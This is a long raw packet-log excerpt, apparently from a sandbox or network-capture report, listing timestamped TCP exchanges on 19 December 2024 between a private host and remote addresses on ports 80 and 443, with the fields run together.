                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023763895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023829937 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023854971 CET49918443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.023866892 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.024872065 CET49918443192.168.2.4104.21.64.80
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.024907112 CET44349918104.21.64.80192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.024909973 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.025546074 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.025619030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.025698900 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.026119947 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.027369022 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.027455091 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.027460098 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.027503967 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.029161930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.029211044 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.029284000 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.029349089 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.030962944 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.031377077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.031450987 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.032748938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.032803059 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.032887936 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.034512043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.034605026 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.034672976 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.092219114 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.092473984 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.092534065 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.092639923 CET49915443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.092679024 CET44349915104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.136404991 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.136512995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.136570930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.137125969 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.137223959 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.137269974 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.137706995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.138577938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.138627052 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.138655901 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.138704062 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.140001059 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.140130997 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.140166998 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.140213013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.141449928 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.141501904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.141524076 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.141943932 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.142839909 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.142899036 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.142956018 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.144228935 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.144284964 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.144288063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.144351959 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.145601988 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.145751953 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.145855904 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.147038937 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.147202969 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.147259951 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.148339033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.148397923 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.148507118 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.148583889 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.149723053 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.149787903 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.149991989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.151038885 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.151185036 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.151268005 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.152379990 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.152456999 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.152534008 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.152595043 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.153676033 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.153776884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.153795958 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.153848886 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.154962063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.155117035 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.155142069 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.155220032 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.156249046 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.156327009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.156377077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.156508923 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.157649994 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.157701969 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.157747030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.157834053 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.158780098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.158905983 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.158987999 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.160084963 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.160206079 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.160269022 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.161334991 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.161370039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.161437035 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.161560059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.162606001 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.162655115 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.162715912 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.162774086 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.163868904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.163992882 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.164020061 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.164160967 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.165127039 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.165196896 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.165261030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.165371895 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.166434050 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.166534901 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.166543961 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.166584969 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.167722940 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.167773962 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.167851925 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.168646097 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.168948889 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.169008970 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.169073105 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.169249058 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.170248032 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.170363903 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.170445919 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.171508074 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.171605110 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.171685934 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.172779083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.172883987 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.172985077 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.174069881 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.174144030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.174186945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.174932957 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.175306082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.175368071 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.175432920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.175530910 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.176595926 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.176676035 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.176683903 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.176722050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.177829981 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.177889109 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.177926064 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.177997112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.179101944 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.179172039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.179215908 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.179424047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.180341959 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.180428028 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.180464029 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.180566072 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.181632996 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.181740999 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.181771994 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.181791067 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.182894945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.182946920 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.182991028 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.183033943 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.184154987 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.184207916 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.184252024 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.184297085 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.185434103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.185533047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.185535908 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.185614109 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.186692953 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.186781883 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.186820030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.186927080 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.187990904 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.188082933 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.188188076 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.189229965 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.189264059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.189331055 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.189444065 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.190485001 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.190551996 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.190625906 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.190727949 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.191762924 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.191829920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.191848993 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.192115068 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.193026066 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.193134069 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.193150043 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.194200039 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.194344044 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.194400072 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.194416046 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.194464922 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.195616961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.195705891 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.195724010 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.195936918 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.196968079 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.197109938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.197133064 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.198124886 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.198184013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.198225975 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.199395895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.199491024 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.199511051 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.199628115 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.200663090 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.200752974 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.200839996 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.202179909 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.202245951 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.202311993 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.203217983 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.203269958 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.203332901 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.204453945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.204586983 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.244364977 CET49922443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.244381905 CET44349922104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.244432926 CET49922443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.244797945 CET49922443192.168.2.4104.21.66.85
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.244823933 CET44349922104.21.66.85192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.328469992 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.328541040 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.328629017 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.329041004 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.329077005 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.329114914 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.329160929 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.330344915 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.330406904 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.330488920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.330622911 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.330719948 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.331650019 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.331756115 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.331799030 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.332760096 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.332906961 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.332909107 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.333406925 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.333985090 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.334081888 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.334137917 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.334985971 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.335094929 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.335202932 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.336078882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.336143017 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.336199999 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.336268902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.337265015 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.337317944 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.337384939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.337429047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.338454008 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.338555098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.338634968 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.339431047 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.339579105 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.339587927 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.339649916 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.340524912 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.340626955 CET4991080192.168.2.431.41.244.11
